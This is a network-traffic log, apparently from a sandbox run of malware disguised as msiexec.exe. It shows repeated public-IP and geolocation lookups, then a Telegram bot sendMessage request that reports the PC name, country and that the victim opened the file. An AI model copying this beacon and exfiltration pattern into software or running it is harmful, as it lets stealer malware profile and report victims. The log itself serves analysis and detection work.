                                                                            X-Request-ID: 0d1d5ed33ccdc9a94b59777ddf5a2ea4
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


                                                                            Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49870 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 1128 | Process: C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp: Nov 4, 2024 07:13:49.164886951 CET | Bytes transferred: 151 | Direction: OUT | Data: GET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Timestamp: Nov 4, 2024 07:13:50.006325960 CET | Bytes transferred: 323 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:49 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: beaeeebce6018a09f641f6f24662f66c
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


                                                                            Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49882 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 1128 | Process: C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp: Nov 4, 2024 07:13:50.779438019 CET | Bytes transferred: 151 | Direction: OUT | Data: GET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Timestamp: Nov 4, 2024 07:13:51.623099089 CET | Bytes transferred: 323 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:51 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 203e1325b1a8933a5820aeb5ccb9cbd5
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


                                                                            Session ID: 8 | Source IP: 192.168.2.5 | Source Port: 49889 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 1128 | Process: C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp: Nov 4, 2024 07:13:52.384509087 CET | Bytes transferred: 151 | Direction: OUT | Data: GET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Timestamp: Nov 4, 2024 07:13:53.210242987 CET | Bytes transferred: 323 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:53 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 10562da5c1afa4c4e5bdd898bf0c5306
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


                                                                            Session ID: 0 | Source IP: 192.168.2.5 | Source Port: 49811 | Destination IP: 188.114.96.34 | Destination Port: 443 | PID: 1128 | Process: C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp: 2024-11-04 06:13:41 UTC | Bytes transferred: 87 | Direction: OUT | Data: GET /xml/173.254.250.69 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            Timestamp: 2024-11-04 06:13:41 UTC | Bytes transferred: 1222 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:41 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 359
                                                                            Connection: close
                                                                            x-amzn-requestid: e4efa8e8-d13f-4030-8c31-0e7b32b72f8c
                                                                            x-amzn-trace-id: Root=1-67284a0a-5b7499381717d30a571c92ee;Parent=0a40f8dd062bc641;Sampled=0;Lineage=1:fc9e8231:0
                                                                            x-cache: Miss from cloudfront
                                                                            via: 1.1 5b3c6a4e26bbf4961fe156f79327ee02.cloudfront.net (CloudFront)
                                                                            x-amz-cf-pop: DFW57-P5
                                                                            x-amz-cf-id: LMfxpBeIdc4uOv1BySdpGpuw_XLxIRzGp39Pi6z_r4dkQmtoLPl60w==
                                                                            Cache-Control: max-age=31536000
                                                                            CF-Cache-Status: HIT
                                                                            Age: 7179
                                                                            Last-Modified: Mon, 04 Nov 2024 04:14:02 GMT
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vV3JQxMrGjUyNNUJpblfswyrpPM0%2Fqcctgv%2FNrio6U7llML6SkLqzzWeyY5tbWNkXv32uPnJW4Mc%2F3iz8zEtsqoBK%2FI4%2BRq3kNTR%2FuvvwY6RgxgwACuHuH2o48ftpbGyTTqQ2dCC"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8dd275a55f8d2e71-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1635&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1746682&cwnd=251&unsent_bytes=0&cid=547bc60fb753c0bf&ts=194&x=0"
                                                                            Timestamp: 2024-11-04 06:13:41 UTC | Bytes transferred: 147 | Direction: IN | Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionN
                                                                            Timestamp: 2024-11-04 06:13:41 UTC | Bytes transferred: 212 | Direction: IN | Data Ascii: ame>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                            Session ID: 1 | Source IP: 192.168.2.5 | Source Port: 49819 | Destination IP: 188.114.96.34 | Destination Port: 443 | PID: 1128 | Process: C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp: 2024-11-04 06:13:42 UTC | Bytes transferred: 63 | Direction: OUT | Data: GET /xml/173.254.250.69 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Timestamp: 2024-11-04 06:13:42 UTC | Bytes transferred: 1221 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:42 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 359
                                                                            Connection: close
                                                                            x-amzn-requestid: e4efa8e8-d13f-4030-8c31-0e7b32b72f8c
                                                                            x-amzn-trace-id: Root=1-67284a0a-5b7499381717d30a571c92ee;Parent=0a40f8dd062bc641;Sampled=0;Lineage=1:fc9e8231:0
                                                                            x-cache: Miss from cloudfront
                                                                            via: 1.1 5b3c6a4e26bbf4961fe156f79327ee02.cloudfront.net (CloudFront)
                                                                            x-amz-cf-pop: DFW57-P5
                                                                            x-amz-cf-id: LMfxpBeIdc4uOv1BySdpGpuw_XLxIRzGp39Pi6z_r4dkQmtoLPl60w==
                                                                            Cache-Control: max-age=31536000
                                                                            CF-Cache-Status: HIT
                                                                            Age: 7180
                                                                            Last-Modified: Mon, 04 Nov 2024 04:14:02 GMT
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qKTpMT1aZmIgQ9fpe%2FsZrHLAhxnCd%2FTCQtxFEgIU0RWK4iXMlZKkPGKgHssNbbWKZzsNHhy5aK9hbsOOV%2FMJo4%2F26ttJniViMtaN5Bx%2Fz%2B5IXEoEz1RP2VXv1CafV3cYf9YwANyY"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8dd275ac5a4445e8-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=997&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2881592&cwnd=251&unsent_bytes=0&cid=92d7ed0e722d0a1f&ts=143&x=0"
                                                                            Timestamp: 2024-11-04 06:13:42 UTC | Bytes transferred: 148 | Direction: IN | Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNa
                                                                            Timestamp: 2024-11-04 06:13:42 UTC | Bytes transferred: 211 | Direction: IN | Data Ascii: me>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                            Session ID: 2 | Source IP: 192.168.2.5 | Source Port: 49829 | Destination IP: 188.114.96.34 | Destination Port: 443 | PID: 1128 | Process: C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp: 2024-11-04 06:13:43 UTC | Bytes transferred: 63 | Direction: OUT | Data: GET /xml/173.254.250.69 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Timestamp: 2024-11-04 06:13:44 UTC | Bytes transferred: 1212 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:44 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 359
                                                                            Connection: close
                                                                            x-amzn-requestid: e4efa8e8-d13f-4030-8c31-0e7b32b72f8c
                                                                            x-amzn-trace-id: Root=1-67284a0a-5b7499381717d30a571c92ee;Parent=0a40f8dd062bc641;Sampled=0;Lineage=1:fc9e8231:0
                                                                            x-cache: Miss from cloudfront
                                                                            via: 1.1 5b3c6a4e26bbf4961fe156f79327ee02.cloudfront.net (CloudFront)
                                                                            x-amz-cf-pop: DFW57-P5
                                                                            x-amz-cf-id: LMfxpBeIdc4uOv1BySdpGpuw_XLxIRzGp39Pi6z_r4dkQmtoLPl60w==
                                                                            Cache-Control: max-age=31536000
                                                                            CF-Cache-Status: HIT
                                                                            Age: 7182
                                                                            Last-Modified: Mon, 04 Nov 2024 04:14:02 GMT
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=37Q4BDKmwhkqfGTOBMqcujUvcIHAQ4JlWfremYyRcufBxEr64iOyOeU3OY8wpa00Y11MS4qXKLYuVsG7puOGRnaWGDoZ98iCH20XjrqKDm%2FU0uUFwTGcyjXxnSLZNNcEo5A3M7xJ"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8dd275b6580d2e17-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2007&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1473791&cwnd=245&unsent_bytes=0&cid=afc51aeee00058d1&ts=156&x=0"
                                                                            Timestamp: 2024-11-04 06:13:44 UTC | Bytes transferred: 157 | Direction: IN | Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas<
                                                                            Timestamp: 2024-11-04 06:13:44 UTC | Bytes transferred: 202 | Direction: IN | Data Ascii: /RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                            Session ID: 3 | Source IP: 192.168.2.5 | Source Port: 49840 | Destination IP: 188.114.96.34 | Destination Port: 443 | PID: 1128 | Process: C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp: 2024-11-04 06:13:45 UTC | Bytes transferred: 87 | Direction: OUT | Data: GET /xml/173.254.250.69 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            Timestamp: 2024-11-04 06:13:45 UTC | Bytes transferred: 1227 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:45 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 359
                                                                            Connection: close
                                                                            x-amzn-requestid: e4efa8e8-d13f-4030-8c31-0e7b32b72f8c
                                                                            x-amzn-trace-id: Root=1-67284a0a-5b7499381717d30a571c92ee;Parent=0a40f8dd062bc641;Sampled=0;Lineage=1:fc9e8231:0
                                                                            x-cache: Miss from cloudfront
                                                                            via: 1.1 5b3c6a4e26bbf4961fe156f79327ee02.cloudfront.net (CloudFront)
                                                                            x-amz-cf-pop: DFW57-P5
                                                                            x-amz-cf-id: LMfxpBeIdc4uOv1BySdpGpuw_XLxIRzGp39Pi6z_r4dkQmtoLPl60w==
                                                                            Cache-Control: max-age=31536000
                                                                            CF-Cache-Status: HIT
                                                                            Age: 7183
                                                                            Last-Modified: Mon, 04 Nov 2024 04:14:02 GMT
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cyWuZCMc5nv7yzcDw7YRCQ975gZoK%2BC3l1ROk%2BbOY%2FPGjjtXwB34%2FJgl7zP2G1zYsenBgvp9dF4hFr%2BisSfFXlBGHFNP%2F8Hz%2BTlF%2F%2Ff44o3cEw7HwM8oVAKSgvfG27HJRX2NEKyQ"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8dd275c1cc296b3f-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=996&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2630336&cwnd=245&unsent_bytes=0&cid=cab88c2ad9bf44b0&ts=359&x=0"
                                                                            2024-11-04 06:13:45 UTC  142                IN         Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><Re
                                                                            2024-11-04 06:13:45 UTC  217                IN         Data Ascii: gionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                            Session ID  Source IP    Source Port  Destination IP     Destination Port  PID   Process
                                                                            4           192.168.2.5  49852        188.114.96.3       443               1128  C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp                Bytes transferred  Direction  Data
                                                                            2024-11-04 06:13:47 UTC  87                 OUT        GET /xml/173.254.250.69 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-11-04 06:13:47 UTC  1218               IN         HTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:47 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 359
                                                                            Connection: close
                                                                            x-amzn-requestid: e4efa8e8-d13f-4030-8c31-0e7b32b72f8c
                                                                            x-amzn-trace-id: Root=1-67284a0a-5b7499381717d30a571c92ee;Parent=0a40f8dd062bc641;Sampled=0;Lineage=1:fc9e8231:0
                                                                            x-cache: Miss from cloudfront
                                                                            via: 1.1 5b3c6a4e26bbf4961fe156f79327ee02.cloudfront.net (CloudFront)
                                                                            x-amz-cf-pop: DFW57-P5
                                                                            x-amz-cf-id: LMfxpBeIdc4uOv1BySdpGpuw_XLxIRzGp39Pi6z_r4dkQmtoLPl60w==
                                                                            Cache-Control: max-age=31536000
                                                                            CF-Cache-Status: HIT
                                                                            Age: 7185
                                                                            Last-Modified: Mon, 04 Nov 2024 04:14:02 GMT
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s2PN0m39uWF9h%2Fz6SBiDvy%2BI6xvJXSjiMvsB15WJMJVoq3ouzKXa9ybm4eKqjACSrUCbVjkcU6HaOpvpwcKN4wuGEaLAo6ftqK%2BwxM4C6zsgmo8aAkudaH%2FD1pFvnj6uXI8mEjgi"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8dd275cbc9d44769-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1224&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2264268&cwnd=249&unsent_bytes=0&cid=a3266824c9f83f2a&ts=146&x=0"
                                                                            2024-11-04 06:13:47 UTC  151                IN         Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>
                                                                            2024-11-04 06:13:47 UTC  208                IN         Data Ascii: Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                            Session ID  Source IP    Source Port  Destination IP     Destination Port  PID   Process
                                                                            5           192.168.2.5  49864        188.114.96.3       443               1128  C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp                Bytes transferred  Direction  Data
                                                                            2024-11-04 06:13:49 UTC  63                 OUT        GET /xml/173.254.250.69 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            2024-11-04 06:13:49 UTC  1222               IN         HTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:49 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 359
                                                                            Connection: close
                                                                            x-amzn-requestid: e4efa8e8-d13f-4030-8c31-0e7b32b72f8c
                                                                            x-amzn-trace-id: Root=1-67284a0a-5b7499381717d30a571c92ee;Parent=0a40f8dd062bc641;Sampled=0;Lineage=1:fc9e8231:0
                                                                            x-cache: Miss from cloudfront
                                                                            via: 1.1 5b3c6a4e26bbf4961fe156f79327ee02.cloudfront.net (CloudFront)
                                                                            x-amz-cf-pop: DFW57-P5
                                                                            x-amz-cf-id: LMfxpBeIdc4uOv1BySdpGpuw_XLxIRzGp39Pi6z_r4dkQmtoLPl60w==
                                                                            Cache-Control: max-age=31536000
                                                                            CF-Cache-Status: HIT
                                                                            Age: 7187
                                                                            Last-Modified: Mon, 04 Nov 2024 04:14:02 GMT
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z5IP%2F%2F%2B21qSQOYDSIhZU8H1l0dyHSaTyT%2BLS9qyZ%2B4dVX%2ByViPmTV1p1bKdprK6oabUJNG3azdMuVVMd8rAKjCGWRMdILGetC4V99wdK4zf4DJsM2nsXm8emyrM2YNwB1PnYgcrT"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8dd275d5cbcea924-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1139&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2639927&cwnd=201&unsent_bytes=0&cid=c07eb21296ce39a6&ts=149&x=0"
                                                                            2024-11-04 06:13:49 UTC  147                IN         Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionN
                                                                            2024-11-04 06:13:49 UTC  212                IN         Data Ascii: ame>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                            Session ID  Source IP    Source Port  Destination IP     Destination Port  PID   Process
                                                                            6           192.168.2.5  49876        188.114.96.3       443               1128  C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp                Bytes transferred  Direction  Data
                                                                            2024-11-04 06:13:50 UTC  87                 OUT        GET /xml/173.254.250.69 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-11-04 06:13:50 UTC  1216               IN         HTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:50 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 359
                                                                            Connection: close
                                                                            x-amzn-requestid: e4efa8e8-d13f-4030-8c31-0e7b32b72f8c
                                                                            x-amzn-trace-id: Root=1-67284a0a-5b7499381717d30a571c92ee;Parent=0a40f8dd062bc641;Sampled=0;Lineage=1:fc9e8231:0
                                                                            x-cache: Miss from cloudfront
                                                                            via: 1.1 5b3c6a4e26bbf4961fe156f79327ee02.cloudfront.net (CloudFront)
                                                                            x-amz-cf-pop: DFW57-P5
                                                                            x-amz-cf-id: LMfxpBeIdc4uOv1BySdpGpuw_XLxIRzGp39Pi6z_r4dkQmtoLPl60w==
                                                                            Cache-Control: max-age=31536000
                                                                            CF-Cache-Status: HIT
                                                                            Age: 7188
                                                                            Last-Modified: Mon, 04 Nov 2024 04:14:02 GMT
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CdY2aE7rVqHgZ6D%2Bl1H2g8Hydx74MrnT6rxTL7GvbKc8FLjC6I9CNzVcUDYYTsWpx6cr%2FeaRnLhwbQ9J7qcd1cDOMTKbE2dnjdiYIWrp20qDighOGXHhPHWMc%2FqZx4eWglqxWL7i"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8dd275dfdf51e962-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1649&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1645454&cwnd=251&unsent_bytes=0&cid=c3abf3c13f66d44e&ts=150&x=0"
                                                                            2024-11-04 06:13:50 UTC  153                IN         Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Te
                                                                            2024-11-04 06:13:50 UTC  206                IN         Data Ascii: xas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                            Session ID  Source IP    Source Port  Destination IP     Destination Port  PID   Process
                                                                            7           192.168.2.5  49887        188.114.96.3       443               1128  C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp                Bytes transferred  Direction  Data
                                                                            2024-11-04 06:13:52 UTC  63                 OUT        GET /xml/173.254.250.69 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            2024-11-04 06:13:52 UTC  1222               IN         HTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:52 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 359
                                                                            Connection: close
                                                                            x-amzn-requestid: e4efa8e8-d13f-4030-8c31-0e7b32b72f8c
                                                                            x-amzn-trace-id: Root=1-67284a0a-5b7499381717d30a571c92ee;Parent=0a40f8dd062bc641;Sampled=0;Lineage=1:fc9e8231:0
                                                                            x-cache: Miss from cloudfront
                                                                            via: 1.1 5b3c6a4e26bbf4961fe156f79327ee02.cloudfront.net (CloudFront)
                                                                            x-amz-cf-pop: DFW57-P5
                                                                            x-amz-cf-id: LMfxpBeIdc4uOv1BySdpGpuw_XLxIRzGp39Pi6z_r4dkQmtoLPl60w==
                                                                            Cache-Control: max-age=31536000
                                                                            CF-Cache-Status: HIT
                                                                            Age: 7190
                                                                            Last-Modified: Mon, 04 Nov 2024 04:14:02 GMT
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PIJE%2FBl6n%2BN0qa6%2BhG8Q21IBQE%2FsKFGe%2F7Oetr6ybuzcSaL2rYqY0V4OUsT6NFxdkUMnByJ9XZfUMRlkh2CaysKD8jTL1vmHGAKVhNPzBSaxqr7BODTZ%2Bk2eK5Dn3Z2ThyK27TYn"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8dd275e9ec994751-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1221&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2253696&cwnd=251&unsent_bytes=0&cid=e780448b34e4e460&ts=144&x=0"
                                                                            2024-11-04 06:13:52 UTC  147                IN         Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionN
                                                                            2024-11-04 06:13:52 UTC  212                IN         Data Ascii: ame>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                            Session ID  Source IP    Source Port  Destination IP     Destination Port  PID   Process
                                                                            8           192.168.2.5  49895        188.114.96.3       443               1128  C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp                Bytes transferred  Direction  Data
                                                                            2024-11-04 06:13:53 UTC  87                 OUT        GET /xml/173.254.250.69 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2024-11-04 06:13:53 UTC  1214               IN         HTTP/1.1 200 OK
                                                                            Date: Mon, 04 Nov 2024 06:13:53 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 359
                                                                            Connection: close
                                                                            x-amzn-requestid: e4efa8e8-d13f-4030-8c31-0e7b32b72f8c
                                                                            x-amzn-trace-id: Root=1-67284a0a-5b7499381717d30a571c92ee;Parent=0a40f8dd062bc641;Sampled=0;Lineage=1:fc9e8231:0
                                                                            x-cache: Miss from cloudfront
                                                                            via: 1.1 5b3c6a4e26bbf4961fe156f79327ee02.cloudfront.net (CloudFront)
                                                                            x-amz-cf-pop: DFW57-P5
                                                                            x-amz-cf-id: LMfxpBeIdc4uOv1BySdpGpuw_XLxIRzGp39Pi6z_r4dkQmtoLPl60w==
                                                                            Cache-Control: max-age=31536000
                                                                            CF-Cache-Status: HIT
                                                                            Age: 7191
                                                                            Last-Modified: Mon, 04 Nov 2024 04:14:02 GMT
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Mz6WCE8F6fztWA8o3t5Se7z0QyDF3qxxczbbEbQamwuKE3aKSrKBOSaqnQHWBPoBrXqSYu%2BC2Aypg2Ljx7Hp1eUp1R5pnqIbXIXSbsD4dq6Bke53rzMKvCq%2FXxE4CxVBhCe9y7o"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8dd275f3cbf24863-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2037&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1397009&cwnd=247&unsent_bytes=0&cid=5dd0173357af496a&ts=144&x=0"
                                                                            2024-11-04 06:13:53 UTC  155                IN         Data Ascii: <Response><IP>173.254.250.69</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texa
                                                                            2024-11-04 06:13:53 UTC  204                IN         Data Ascii: s</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                            Session ID  Source IP    Source Port  Destination IP     Destination Port  PID   Process
                                                                            9           192.168.2.5  49901        149.154.167.220    443               1128  C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp                Bytes transferred  Direction  Data
                                                                            2024-11-04 06:13:54 UTC  349                OUT        GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2004/11/2024%20/%2016:35:45%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                            Host: api.telegram.org
                                                                            Connection: Keep-Alive
                                                                            2024-11-04 06:13:55 UTC  344                IN         HTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0
                                                                            Date: Mon, 04 Nov 2024 06:13:54 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 55
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
